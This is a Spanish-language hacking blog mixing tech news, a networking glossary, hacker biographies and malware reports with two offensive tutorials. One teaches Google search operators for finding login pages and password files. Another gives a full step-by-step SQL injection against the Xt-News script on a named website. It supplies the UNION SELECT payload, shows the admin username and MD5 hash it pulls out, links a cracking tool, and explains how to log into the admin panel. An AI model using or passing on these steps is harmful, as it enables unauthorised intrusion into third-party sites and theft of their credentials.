El primer ordenador cuántico

El primer ordenador cuántico, ¿es un sueño?

Según el físico teórico español, Juan Ignacio Cirac, especialista en mecánica cuántica; no, no es un sueño. Más bien, es algo que él tiene en mente construir. Y esto, en un plazo de “5 o 10 años“.

El reciente galardonado con el Príncipe de Asturias de Investigación Científica y Téncica,en un escrito suyo del 1995, demostró teóricamente que la construcciónde un ordenador cuántico es algo factible a nivel teórico. Basicamente,nos explica el científico, los átomos pueden ser usados para procesar la información(del mismo modo que actualmente se usan los bits que poseen dosvalores. 0 y 1) pero con una doble diferencia. Un átomo, por su tamaño,es mucho más eficiente; y además, cada átomo, además de los dos valores(llamemoslos 0 y 1) que puede tomar todo bit normal, podría tomar unvalor intermedio conocido como “superposición”. Cada uno de estos “bits cuanticos”, conocidos como qbits, serían mucho más potentes que un bit convencional.

Parece un sueño, pero un ordenador cuántico con 500 “qbits”, gracias a las combinaciones de sus estados superpuestos”, tendría una potencia de cálculo equivalente a la de un ordenador convencional con cerca de 10 elevado a 150 procesadores, lo cual es imposible de construir.

Tal es la potencia de estos ordenadores cuánticos, afirma Cirac, que conseguirian desentrañar todas y cada una de las claves que hoy día existen.

Los 10 mejores productos del año

La versión estadounidense de la revista PC World, publicará en Julio, una lista con los 100 mejores productos tecnológicos del año pasado.

1- El microprocesador Intel Core Duo: A diferenciadel AMD Athlon 64 X2 Dual-Core (en el puesto 2) que también es muybueno, AMD no logró arrasar en una versión móvil.
Además, sus procesadores para notebook no tienen la misma eficiencia que los de Intel.

2 -AMD Athlon 64 X2 Dual-Core: La revista afirma que el X2, es lo perfecto para la máxima capacidad para diversas aplicaciones.

PcWorld3- Craiglist.org:Página de clasificados gratuitos en Internet ahora disponibles en másde 200 ciudades del mundo. La revista PCWorld asegura que este serviciohace fuerte competencia a los clasificados tradicionales de los diariosde papel.

4- Apple iPod Nano: con 4GB de alamacenamiento y pantalla a color, este reproductor de audio de pequeño espacio es uno de los mejores del mercado.

5- Seagate 160GB Portable Hard Drive: Este discoduro fue el primero en usar el método perpendicular de grabaciónmagnética (PMR) con el fin de conseguir almacenar más información en elmismo espacio. Otro dispositivo PMR de Seagate, el Barracuda 7200.10,es el primero en poder almacenar hasta 750 GB.

6- Google Earth: Sin duda, un producto Google debía estar en esta lista. Imágenes desde satélite de los rincones más inhóspitos de la Tierra.

7- Adobe Premiere Elements 2: PCWolrd afirma que“este fuerte y estable editor de video cuesta alrededor de una octavaparte que el Premiere Pro, el producto de Adobe para profesionales enedición de video. Y es tan bueno que no sentirá la diferencia”.

8- Cannon EOS 30D: Con un sensor CMOS de 8,2megapíxeles y una multiplicación focal de 1,6x esta cámara digital esde las mejores del mercado; tiene una sensibilidad entre 100 y 3200 ISO(este último valor sin calibrar). Procesador Digic II, velocidad dedisparo en ráfaga de hasta 5 fotogramas por segundo. Gracias a esto“ganó altas marcas en nuestros test de calidad de imagen”, dice larevista.

9- YouTube.com: Sitio web que permite mirar, almacenar y compartir videos con millones de internautas alrededor del mundo.

10- Apple Boot Camp: Orientado para los usuarios deMac. Esta aplicación permite a los usuarios de una Mac-Intel utilizarel sistema operativo Windows XP. “El próximo paso: ejecutar el Mac OSen sistema de Windows… eso, o cerdos volando por el cielo”, dicePCWorld.

Glosario sobre terminos

Bueno para empezar aqui les traigo unos terminos que necesitan saber, es tan solo un glosario para newbe’s creo que es vastante interesante espero les guste :D

A

ADMINISTRADOR DE UNA WEB
Operador del sistema de un sitio Web.

ANCHO DE BANDA
Medida de capacidad de comunicacion o velocidad de transmision
de datos de un circuito o canal.

ARRASTRAR Y COLOCAR
Concepto de GUI (Interfaz grafica de usuario) que permite
seleccionar un objeto de la pantalla y pasarlo como entrada a
otro objeto (icono).

B

BACKBONE
Red de banda ancha para conexiones entre conmutadores.

BANDA AMPLIA
Ruta/circuito de comunicaciones de capacidad media. Suele
indicar una velocidad de 64000 bps a 1544 Mbps.

BANDA ANCHA
Ruta/circuito de comunicaciones de gran capacidad. Normalmente
implica una velocidad superior a 1544 Mbps.

BASE DE DATOS
Conjunto de informacion para varios usuarios. Suele admitir la
seleccion de acceso aleatorio y multiples “vistas” o niveles
de abstraccion de los datos subyacentes.

BAUDIO
(termino antiguo que se esta reemplazando por bps - bits
por segundo):
Numero de elementos de se¤alizacion que pueden transmitirse
por segundo en un circuito.

BIT
Cantidad de informacion mas peque¤a que puede transmitirse.
Una combinacion de bits puede indicar un caracter alfabetico,
un digito, una se¤al, un modificador u otras funciones.

BOT
“bot” es el termino coloquial para programas que escuchan una
conversacion y responden en un canal IRC.

BPS
Bits por segundo. Medida de velocidad de un modem.

BBS (Sistema de boletin electronico)
Boletin electronico en el que los usuarios pueden dejar
mensajes. En muchos BBS es necesario ser miembro de ellos.

C

CANAL
Via (canalizacion) de telecomunicaciones con una determinada
capacidad (velocidad) entre dos ubicaciones de una red.

CAPACIDAD
La mayor velocidad de transmision posible (fiable) que puede
darse en un canal, un circuito o una pieza de equipo. La
capacidad puede expresarse como la velocidad bruta o como el
rendimiento neto.

CATV
Television por cable - Television por antena comunitaria. Un
sistema de television comunitaria, servida por cable y
conectada a una antena (o grupo de antenas) comun. La
legislacion federal de EE.UU. de 1994 permite a los
proveedores de CATV competir por servicios telefonicos (en la
superautopista de la informacion).

CERN
European Laboratory for Particle Physics, el sitio donde se
celebro la primera conferencia sobre World Wide Web y
considerado el lugar de nacimiento de la tecnologia de WWW. El
trabajo sobre la tecnologia de WWW y la elaboracion de
estandares se ha trasladado a la World Wide Web Organization
(W3O, en w3.org). http://www.cern.ch/

CGI (Interfaz de gateway comun)
Interfaz para programadores que crean archivos de comandos o
aplicaciones que se ejecutan internamente en un servidor de
Web. Estos archivos de comandos pueden generar texto y otros
tipos de datos de forma inmediata, en respuesta a una entrada
del usuario, o bien tomando la informacion de una base de
datos.

CIBERESPACIO
Termino utilizado originalmente en la novela “Neuromante”, de
Willian Gibson, sobre redes de equipos informaticos en el
cerebro. Se refiere al campo colectivo de la comunicacion
asistida mediante equipos informaticos.

COMPRESIÓN/DESCOMPRESION
Metodo para cifrar/descifrar se¤ales que permite transmitir (o
almacenar) mas informacion de la que, de otro modo, podria
aceptar el soporte.

CONEXION
Ruta de comunicaciones dedicada punto a punto o conmutada.

CONVERSACION
Termino que se utiliza para describir una conferencia en
tiempo real. Las salas de conversaciones IRC, “WebChat”,
prodigy y aol son ejemplos de “conversacion”.

CUELLO DE BOTELLA
Limite en la capacidad del sistema que puede reducir el
trafico en condiciones de sobrecarga.

D

DIGITAL
Dispositivo o metodo que utiliza variaciones discretas en
voltaje, frecuencia, amplitud, ubicacion, etc. para cifrar,
procesar o transportar se¤ales binarias (0 o 1) para datos
informaticos, sonido, video u otra informacion.

DIRECCION
Codigo exclusivo asignado a la ubicacion de un archivo
almacenado, un dispositivo en un sistema o red, o cualquier
origen de datos de una red.

DIRECCION IP
Direccion de 32 bits del protocolo Internet asignada a un
host. La direccion IP tiene un componente del host y un
componente de la red.

DIRECCION URL (Uniform Resource Locator)
Formato de las direcciones de sitios que muestra el nombre del
servidor en el que se almacenan los archivos del sitio, la
ruta de acceso al directorio del archivo y su nombre.

E

EXPLORADOR
Programa de aplicacion que proporciona una interfaz grafica
interactiva para buscar localizar, ver y administrar la
informacion a traves de una red.

F

FAQ
Preguntas mas frecuentes.

FINGER
Protocolo que permite localizar informacion sobre los usuarios
en la red del host. Algunas redes no permiten su uso desde un
sistema externo, y otras no lo permiten en absoluto.

“FLAME WAR”
Apasionado debate en linea en el que no se incluye la
politica.

FTP (Protocolo de transferencia de archivos)
Protocolo utilizado para transferir archivos a traves de una
amplia variedad de sistemas.

G

GATEWAY
Conversor de protocolos. Nodo especifico de la aplicacion que
conecta redes que de otra forma serian incompatibles.
Convierte codigos de datos y protocolos de transmision que
permiten la interoperatividad.

GIF
Formato de intercambio de graficos. GIF es un formato estandar
para archivos de imagenes en WWW. El formato de archivos GIF
es muy comun, ya que utiliza un metodo de compresion para
reducir los archivos.

GOPHER
Programa de busqueda y exploracion de bases de datos publicas
en Internet.

GUI
Interfaz grafica de usuario.

H

HIPERMEDIO
Metodo para presentar informacion en unidades discretas, o
nodos, que estan conectados mediante vinculos. La informacion
puede presentarse utilizando distintos medios, como
documentacion ejecutable, de texto, graficos, audio, video,
animacion o imagen.

HIPERTEXTO
Describe un tipo de funcionalidad de exploracion en linea
interactiva. Los vinculos (direcciones URL) incrustados en
palabras o frases permiten al usuario seleccionar texto (p.
ej. haciendo clic con el mouse) y mostrar inmediatamente
informacion relacionada y material multimedia.

HIPERVÍNCULO
Conexiones entre una informacion y otra.

HTML (Hypertext Markup Language)
Lenguaje de “etiquetas” en el que se asigna formato a las
paginas de Web y se distribuye la informacion.

HTTP (Protocolo de transferencia de hipertexto)
Metodo mediante el que se transfieren documentos desde el
sistema host o servidor a los exploradores y usuarios
individuales.

I

IP (Protocolo Internet)
Define la unidad de informacion enviada entre sistemas, que
proporciona un servicio de entrega de paquetes basico.
ISDN (Red digital de servicios integrados)
(Tambien llamada RDSI) Juego de normas de la transmision a
gran velocidad de informacion simultanea de voz, datos e
informacion a traves de menos canales de los que serian
necesarios de otro modo, mediante el uso de la se¤alizacion
fuera de banda.

J

JPEG
Joint Photographic Experts Group. Se trata de un conocido
metodo para comprimir imagenes fotograficas. Muchos
exploradores del Web aceptan imagenes JPEG como el formato de
archivo estandar para la visualizacion.

L

LINEA DEDICADA
Linea privada alquilada a una empresa de telecomunicaciones.

LISTSERV
“ListServ” es un programa gratuito para automatizar el
mantenimiento y la entrega de listas de correo electronico.
Hay listas de muchos temas; algunas son “abiertas” (cualquier
persona de la lista puede enviar un mensaje a toda la lista,
como en una conversacion) y otras “cerradas” (solo
determinadas personas pueden enviar informacion a ellas).

SITIO
Ubicacion de la direccion de un servidor en Internet.

M

MODEM (Modulador-Desmodulador)
Conexion del equipo del usuario final que permite transmitir
datos digitales a traves de dispositivos de transmision
analogicos, como las lineas telefonicas.

MPEG
Moving Pictures Expert Group. Se trata de un modo estandar de
comprimir video de imagenes en movimiento.

MULTIMEDIA
Sistemas informaticos que integran audio, video y datos.

N

NCSA
El National Center for Supercomputing Applications es una
institucion de formacion. El explorador de Web Mosaic se creo
aqui. http://www.ncsa.uiuc.edu/

P

PAGINA
Documento de hipermedia en el Web.

PKZIP
PKZIP es una utilidad compartida de compresion para PCs. Para
descomprimir estos archivos se utiliza un programa llamado

PKUNZIP.
“POP” (punto de presencia)
Conexion de acceso telefonico de los proveedores de servicios
de Internet para usuarios de modem, que se utiliza
principalmente para describir conexiones locales, de forma que
los usuarios no tengan que hacer llamadas de larga distancia.
Por ejemplo, un determinado ISP puede tener su base en San
Jose, pero tener “POP” en Los Angeles y Nueva York.

PORTADORA
Proveedor de telecomunicaciones que posee su propio equipo de
conmutacion de redes.

PORTADORA COMÚN
(Empresa de telecomunicaciones) Portadora que sirve al publico
(o a un segmento de el) de forma indiscriminada (es decir, sin
tener en cuenta la identidad del cliente y sin discriminacion
indebida).

PPP (Protocolo punto a punto)
Conexion a Internet de acceso telefonico que utiliza el
protocolo TCP/IP; algo mas rapido que SLIP.

PRINCIPAL
Primera pagina de un sitio, que contiene informacion de
identificacion y un indice.

PRIVILEGIOS DE ACCESO
Privilegio para tener acceso a carpetas y hacer cambios en
ellas.

PUNTERO
Direccion URL incrustada en los datos que especifica su
ubicacion en otro registro o archivo. El hipervinculo es un
ejemplo de puntero.

R

RED
Sistema de elementos interrelacionados que se conectan
mediante un vinculo dedicado o conmutado para proporcionar una
comunicacion local o remota (de voz, video, datos, etc.) y
facilitar el intercambio de informacion entre usuarios con
intereses comunes.

ROBOT
Los “Robots” suelen mencionarse en el contexto de WWW como
programas que se mueven por el Web buscando informacion; por
ejemplo, para crear indices en dispositivos de busqueda o
localizar errores en sitios Web o funciones similares.

S

SEGURIDAD
Mecanismos de control que evitan el uso no autorizado de
recursos.

SEÑAL
Cambio de estado orientado a eventos (p. ej. un tono, cambio
de frecuencia, valor binario, alarma, mensaje, etc.).

SERVIDOR
En una red, estacion host de datos que proporciona servicios a
otras estaciones.

SERVIDOR DE ARCHIVOS
Sistema informatico que permite a usuarios remotos (clientes)
tener acceso a archivos.

SGML
Standard Generalized Markup Language. Lenguaje para la
descripcion de otros lenguajes de documentos estructurales
basados en etiquetas. Por ejemplo, el HTML esta definido
mediante el SGML.

SLIP (Protocolo Internet de linea en serie)
Conexion de acceso telefonico a Internet que utiliza el
protocolo TCP/IP.

SOPORTE
Formato de distribucion y almacenamiento de informacion (p.
ej. cinta de video, disquete, disco optico, impresora, etc.).
Una ampliacion de la capacidad de comunicacion de la
humanidad. Es el mensaje.

SSL
Nivel de socket de seguridad. Protocolo que utiliza Netscape
para proporcionar transacciones seguras a traves de la red.

SUPERAUTOPISTA DE LA INFORMACION
Una palabra de moda (vease tambien media, hiper…). Hace
referencia al plan de la administracion de Clinton/Gore para
liberalizar los servicios de comunicacion, permitiendo la
integracion de todos los aspectos de Internet, CATV, telefono,
empresas, ocio, proveedores de informacion, educacion, etc.

T

TCP/IP
Protocolo de control de transmisiones/Protocolo Internet. Es
el protocolo estandar de comunicaciones en red utilizado para
conectar sistemas informaticos a traves de Internet.
TELNET
Programa de red que ofrece una forma de conectarse y trabajar
desde otro equipo. Al conectarse a otro sistema, los usuarios
pueden tener acceso a servicios de Internet que quizas no
tengan en sus propios equipos.

TIEMPO REAL
Rapida transmision y proceso de datos orientados a eventos y
transacciones a medida que se producen, en contraposicion a
almacenarse y retransmitirse o procesarse por lotes.
TRANSFERIR
Trasladar programas o datos de equipos informaticos a
dispositivos conectados, normalmente de servidores a PCs.

U

UNZIP
Descomprimir o expandir un archivo que se habia reducido
mediante una utilidad de compresion.

USENET (USEer NETwork) Grupos de debate de Internet. Uno de los primeros formatos de
“correo electronico colectivo”. Actualmente hay unos 10000
grupos de debate diferentes.

V

VINCULO DE COMUNICACIONES
Sistema de equipo y programas que conecta a dos usuarios
finales.

VRML - Virtual Reality Modeling Language
Lenguaje de “etiquetas” en el que las paginas de Web estan formateadas para permitir graficos en 3D y la exploracion
espacial interactiva.

W
WAIS (Wide Area Information Server)

Potente sistema para buscar grandes cantidades de informacion
muy rapidamente en Internet.
WAV
“wav” es la extension que utilizan algunos archivos de audio.
WINZIP
Winzip es un utilidad de compresion que permite a los usuarios
de Windows 95, 3.1 y NT reducir el tama¤o de sus archivos para transferirlos mas rapidamente a traves de Internet. Esta

utilidad tambien descomprime archivos comprimidos con formatos PKZIP o TAR. http://www.winzip.com/winzip/

WWW (World Wide Web)
Sistema de Internet para vincular mediante hipertexto en todo
el mundo documentos multimedia, permitiendo un facil acceso,
totalmente independiente de la ubicacion fisica, a la
informacion comun entre documentos.

Z

ZIP
Al “comprimir” (es decir, hacer una copia de menor tama¤o,
pero igual) un archivo mediante “pkzip”, el archivo resultante
se denomina un archivo “zip”. Suele terminar con la extension
“.zip”.

Google, una muy buena herramienta Hack Parte I.


  1. Introducción

Bien, espero que todos conozcan google: www.google.com. Google, sin miedo a equivocarme, es el motor de búsqueda más usado, y el que mejor funciona, en todo el mundo.

Como espero que sepan, las búsquedas en google.com se realizan en el TxtBox:

Google tiene algo parecido a unos comandos, son palabras clave para sus búsquedas. Nosotros, en este tutorial, usaremos las más normales y básicas para encontrar buena información.

Define: Este, creo que es el comando que más he utilizado en toda mi vida, este comando da una definición de la palabra que viene después. Define:palabra_a_definir por ejemplo Define:ARP.

Allinurl: Este comando mostrará todas las páginas indexadas del dominio escrito en la búsqueda, también mostrará las páginas que tenganlas palabras buscadas en la direcciónURL: allinurl:www.elhacker.org si no pueden probar con allinurl:/login.asp y encontrarán todo tipo de webs que contengan esa página, recuerdan SQL injection? ;)

Site: Este comando hará que la búsqueda sólo tenga lugar en el sitio indicado. Su sinopsis es muy simple: site:www.elhacker.org batch, el motor de búsqueda, buscará todos los textos con la palabra batch, únicamente en la página www.elhacker.org

Info: Realmente este comando puede resultar bastante útil, puesto a que da información acerca de la página que viene a continuación: info:www.elhacker.org

Intitle: Este comando, funciona de la siguente forma: intitle:index of lo que hace es buscar cualquier título de la web. Para que lo comprendan mejor. Si miran arriba de su navegador, verán como título: BlogDelHacker - Por lo menos eso es lo que veo yo en estos momentos :) -

Filetype: Para este comando, se debe especificar un tipo de extensión para que la búsqueda tenga su efecto. Me explico mejor, supongamos que ustedes quieren descargarse algún pdf de hacking… ustedes pueden poner: filetype:pdf hacking en el resultado, obtendrán como direcciones URL: www.dominio.com/path/hacking.pdf. Esto puede ser útil para buscar archivos de password, .dat entre otros ;).

Existen más comandos, pero con estos nos valdrá para este primero manual.

Ahora podemos realizar varias búsquedas con google, abriendo su website diversas formas y hacer búsquedas específicas de forma que podamos encontrar resultados realmente claves.

Bien la primera parte ha sido realmente corta, pero de igual forma, espero que hayan aprendido algo si no es así, usen google.

Vulnerabilidad en “Xt-NewsPowered”

Bueno esta vulneravilidad consiste en una injecction SQL.

Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.

“Powered by Xt-News”

Resultado de la busqueda en google:

 

http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+XtNews&meta=&btnG=Buscar+con+Google

Ahora escogemos alguna web la que sea.

En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206

Ahora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:

show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1

Ahora pegamos eso en nuetro navegador,Pero antes tienes que borrar print.php?id_news=206

Entonces nuestra url quedara asi:

http://polyrando.org/xtnews/show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1

Ahora como vemos nos dira el user de admin: webmaster

Y nos dira una hash la cual es el password: 511131faa0a1abe83057f52dc61d40e2

ahora solo falta crackear el password con algun md5

Aqui les dejo uno: http://rapidshare.com/files/40519889/mdcrack.rar

Ahora lo que tienen que haces es descomprimir el mdcrack en su HD.

Y quedara asi:

C/mdcrack

ahora para ejecutarlo van a la consola o ms-dos o cmd

y tipeamos esto

c:/mdcrack/mdcrack.exe <AKI IRA LA HASH>

c:/mdcrack/mdcrack.exe 511131faa0a1abe83057f52dc61d40e2

damos enter.

Esperamos a que nos de el password y para loguearnos tenemos que haces esto.

http://polyrando.org/xtnews/admin/

Solo tenemos que poner despues del ultimo / [admin] y directamente nos mandara a loguearnos como admin y tipeamos el user y el password.

 

Si encuentran muy dificil la parte de obtener el hash pueden hacerlo de forma online desde la web www.milw0rm.com

Bueno eso es todo.

Casi todos los PC`s Tienen Vulnerabilidades

 Prácticamente todos los computadores que en uno u otro momento hayan estado conectados Internet tienen, en algún lugar de sus discos duros, código oculto que hace posible su intervención por parte de hackers, señala la consultora Aberdeen Group en su último informe.

El informe es el más sombrío en su tipo presentado hasta ahora. Según Aberdeen Group, “hay que buscar de manera exhaustiva si se quiere encontrar un PC que no contenga código maligno oculto”.

“Casi todos los proveedores de conexión a Internet, muchas redes corporativas y la mayoría de los computadores de particulares contienen código activo que puede ser utilizado para espionaje electrónico, spam, robo de datos, criminalidad informática”, escribe Jim Hurley, director de seguridad informática en Aberdeen Group.

Hurley afirma que los programas ocultos eluden sin dificultar los programas de seguridad como cortafuegos, antivirus, sistemas de análisis de puertos y herramientas de detección de intrusiones.

El informe ha sido recibido con críticas por diversas compañías dedicadas a la seguridad informática. En un comentario hecho a la publicación Wired, el experto Bob Antia, de la consultora de seguridad Guardent, señala que “un PC hogareño corriente puede contener grandes cantidades de material comprometedor, pero el problema no es tan grave como se indica en el informe de Aberdeen”.

Sin embargo, el  nuevo consorcio OIS (Organization for Internet Safety), que entre sus afiliados cuenta a Microsoft, Oracle y Network Associates, confirma que la situación ha empeorado debido a que el tiempo que pasa desde la detección de un agujero de seguridad y el surgimiento de un gusano o virus que lo aprovecha, ha disminuido considerablemente.

OIS aspira a solucionar el problema estableciendo una estrecha red  de cooperación entre los grandes fabricantes de software. De esa forma se espera, entre otras cosas, conseguir que los agujeros de seguridad sean corregidos con mayor celeridad.

iPhone propaga Virus

Piratas informáticos usan el iPhone para propagar Virus

Según el informe semanal de Panda Software, existe un nuevo virus / troyano / gusano, denominado Aiphone.A que aprovecha todo el revuelo causado por la venta en línea del nuevo celular producido por la gente de Steve Jobs.

El éxitoso iPhone, creado por Apple, que en su salida a la venta, ha reportado más de un millón de unidades vendidas, sólo en Estados Unidos. Debido a estó, ha sido el objetivo del creador de este malware, quien ha decidido robar datos bancarios utilizando lo último en ingeniería social.

Este troyano, penetra a nuestros sistemas como un objeto de ayuda al navegador (BHO según sus siglas en ingles). La forma más común como afecta es vía archivo anexo en un correo electrónico o archivos infectados descargados desde internet. Una vez alojado, muestra su verdadero ingenio, y está provista de varias herramientas, cada una diseñada para obtener nuestra información bancaria por diferentes formas.

Utilizando la técnica denominada Redirects Admin, cuyo objetivo es redirigirnos a una página falsa de iPhone, si introducimos en nuestro navegador, las direcciones de las páginas oficiales de iPhone.

Una segunda alternativa para este troyano, es el uso de Search Redir, donde al nosotros iniciar una busqueda, en cualquier directorio o buscador que usemos, los primeros resultados de las busquedas solicitadas tendran la dirección de la mencionada página falsa.

Por si esto no es suficiente, queda la técnica Inject Admin, que busca sustituir en la página que estemos visitando, la publicidad o link que este relacionado con el iPhone, por un enlace hacia la página falsa.

Este virus, mezcla el uso de los troyanos (malware), con técnicas phishing (página falsa) y adware (resultados de busqueda modificadas, pop-up relacionados al iphone), ocasionando una alta probabilidad de poder adquirir la información bancaria del usuario.

Hacker: se busca a David L. Smith

 

El macro virus Melissa atacó a miles de usuarios y empresas el 26 de Marzo de 1999, después de haber sido esparcido como un documento de MS-Word infectado en un grupo de noticias de Usenet, que conformaban una lista de interés sobre páginas web porno. Después de las investigaciones correspondientes se arrestó a su supuesto autor, David L. Smith.

El 8 de Abril de 1999, el cracker David L. Smith, con la edad de 30 años, sospechoso de ser el autor del virus Melissa hizo su primera aparición en público en la Corte Superior del condado de Monmouth para escuchar las acusaciones en su contra.

Smith permaneció silencioso y cabizbajo cuando escuchó los cargos.Las autoridades de New Jersey acusaron a Smith de interrupción de las comunicaciones públicas, conspiración para cometer el delito, intento de delito y robo de servicios de computadoras, en tercer grado.

Todo esto lo haría enfrentar una posible pena de 40 años de cárcel y al pago de una multa de US $ 480,000. El delito, que incluye “interceptación de las comunicaciones de computadoras y daños a los sistemas de computadora o a su información” es castigado con una carcelería de 5 a 10 años y hasta US $150,000 de multa. Como consecuencia de la acusación, Smith ha aceptado recibir la máxima pena por el delito, el Juez pudo ignorar esta recomendación, pero no lo hizo.

Smith no es el primer escritor de virus en ser castigado por las autoriudades. El 15 de noviembre de 1996, el cracker “Black Baron” fue ajusticiado por 11 intrusiones bajo las Secciones 2 y 3 del “Computer Misuyce Act” en “Exeter Crown Court” en Inglaterra. Este cracker sigue todavia pagando la culpa y recientemente le han ampliado 18 meses más su estancia en prisión.

Prisión de Alcatraz

 

La prisión de Alcatraz en la bahía de San Francisco. Muchos presos célebres como Al Capone han pasao por sus muros.

 

Ver en Google Earth:

http://www.tierracuriosa.com/wp-content/uploads/2007/06/alcatraz.kmz

Torres Petronas de Malasia

 

Una vista de las torres Petronas de Malasia, una maravilla de la ingeniería, si os fijáis ambas tienen un puente que las comunica.

 

Ver en Google Earth:

http://www.tierracuriosa.com/wp-content/uploads/2007/06/torrespetronas.kmz

Disneyland Resort Paris

 

Disneyland Resort Paris, una maravilla para la diversión en Francia.

 

Ver en Google Earth:

http://www.tierracuriosa.com/wp-content/uploads/2007/06/disneyland.kmz

Hacker: “hackers” escolares

 

El 7 de Junio del 2002, el South Florida Sun Sentinel, comunicó que una profesora del Western High School, en Florida, descubió que un estudiante al que le habia dado un “cero” en un examen sobre 100 puntos, en los resultados públicos tenía la nota más alta, 100 puntos. 

Se dió cuenta que lo mismo ocurrió con otros 15 estudiantes más. Dos estudiantes, conocidos como “hackers” de la informática, génios de la informática, fueron inicialmente suspendidos por 10 días despues de actuar como unos auténticos crackers, al modificar sus notas, pero no pudieron ser acusados formalmente, por ser menores de edad. Despues de descubrirles, se descubrió que cada nota que modificaban, lo hacían por 5$.

Los profesores, tuvieron que revisar manualmente los 4.500 alumnos que habian realizado el examen para comprobar errores o “cambios” en las notas.

No es la primera vez que esto ocurre.

Algo así hizo el estudiante conocido como Jhonny Cracker, autor del virus Fujimori, quien en 1999 fue descubierto y expulsado, junto a otros 10 estudiantes que usaron ese macro virus. Este virus permitía acceder a la base de datos de la escuela y así alterar las notas.

A los 3 años de ser descubiertos fueron juzgados por el tribunal de justicia peruano.

Hacker: se busca a Kevin Lee Poulsen

 

 

 

Un Hacker, propiamente es aquel que tiene un conocimiento de la informatica, muy superior al resto de los usuarios. Los hackers no debemos confundirlos con muchos que se hacen llamar hackers, como es el caso de los crackers y otros maleantes.

A lo largo de la historia de la informática y del hacking, hay algunos hackers y crackers que pasarán a la historia gracias a sus descubrimientos y aportaciones.

Semana a semana iré subiendo perfiles de distintos hackers conocidos y que han sido muy peligrosos.

Hoy es el turno de Kevin Lee Poulsen.

“Watchman” era uno de los apodos de este hacker estadounidense, aunque muchos afirman que se le podía haber llamado “el rey del teléfono”. Con una habilidad digna de un gran hacker, consiguió destruir y franquear infinidad de sistemas informáticos, pero sus “preferidos” eran los dependientes del Ministerio de defensa estadounidense.

En el año 1990 consiguió ganar un Porsche en un concurso radiofónico de la radio KIIS-FM (de Los Ángeles), gracias a su habilidad, lo cual le lanzó a la fama como hacker. Lo consiguió gracias a bloquear distintas centralitas, y consiguiendo ser la llamada que contenía el premio, la 102. Al año este hacker apodado también como “Dark dante” ingresó en prisión y estuvo preso el mayor tiempo que un hacker haya estado encerrado, 5 años.

Actualmente ha pasado de ser un hacker a ser un experto en seguridad informática y es director del sitio “Security Focus“.

Hacker: se busca a Kevin David Mitnick

 

Kevin David Mitnick, autoapodado como “Condor” por la película de espionaje Los tres días del Condor, es, sin duda, uno de los hackers más conocido del mundo. Su vida como Hacker comenzó desde muy pequeño, ya que desde siempre tuvo una gran curiosidad por los sistemas de comunicación electrónica y se autoalimentó un deseo, quizas algo obsesivo por conocer cosas y ser capaz de lograr objetivos casi imposibles.

Un poco más mayor fue cuando comenzó su vida como Cracker, ya que consiguió tener una gran habilidad para robar información, ingresar en servidores sin autorización, crear virus, interceptar teléfonos, etc. Muestra de ello, fueron sus ataques a empresas como Novell, Motorola, Nokia y Sun Microsystem, el Pentágono, el FBI y la Universidad de Southern en California.

De todos ellos el que le llevó a prisión fue el del FBI. Robó informaciones que llevaron al gobieron estadounidense a mudar todos sus centros secretos de comunicación a sitios inaccesibles y al FBI a gastarse millones de dólares. Se convirtió por 3 años en un fugitivo de la justicia, hasta ser capturado por el FBI en el 1995. A raiz de eso pasaría casi 5 años en prisión. Gracias a esto se convirtió en un Símbolo entre la comunidad internacional de crackers.

La Juez del U.S. District, cuando Mitnick fue liberado en el año 2000, le prohibió todo contacto con computadores, televisión, teléfonos celulares o cualquier otro dispositivo electrónico que pudiera ser usado a través de internet hasta un periodo de 3 años y pensó que Mitnick no obtendría ningún recurso económico por encima del salario mínimo.

Devido a su popularidad en este periodo, interpretó en la serie Alisa un papel como agente de la CIA, y nada más salir de prisión Mitnick ganó 20.000$ por una serie de conferencias sobre seguridad en internet, en un periodo de un mes.

Hoy, el hacker Kevin Mitnick, tiene su propia empresa de Seguridad y Consutloría, Mitnick Security Consulting LCC. Además vende via on-line sus dos “best sellers”: El Arte de la Decepción donde explica la vulnerabilidad de protocolos de encriptación y de los Firewalls; y El Arte de la Intrusión, donde habla de lo importante del “encanto personal” en un hacker.

¿Qué es un hacker?

 

La utilización del término hacker quizás sea uno de los más desconocidos en la actualidad, y es que la repeteción y repetición de ese término para designar a otro, es continua.

Todo el mundo cree que alguien que roba información de un servidor, provoque algún tipo de daño en la red, tire servidores, modifique webs… es un hacker pero para todo eso hay un término que se refiere a un vándalo, delincuente con altos conocimientos técnicos, un cracker.

Se denominan hackers a aquellos que siguen una ética basada en una serie de valores, esta ética es de tipo axiológico y según Himanen tiene siete puntos fundamentales:

Pasión
Libertad
Valor social
Accesibilidad
Actividad
Preocupación responsable
Creatividad

Si me permiten mis amigos de @rroba les copiaré una frase que repiten en todos y cada uno de sus ejemplares “El hacker no nace hacker, sino con la curiosidad bajo el brazo, luego se hace hacker, cuando aprovecha esa sed de conocimientos y habilidad innata para aplicarlos y estudia, aprende, aplica y crea.”

Acerca de cronicasdehacker

Mis cronicas de hacker

Archivo

Suscríbete

RSS | Atom

Contacto

Contactar


Used cars Albergado en:blogspot.es

Noticias: Noticias

Un servicio de HispaVista

Contador gratis contadorplus.com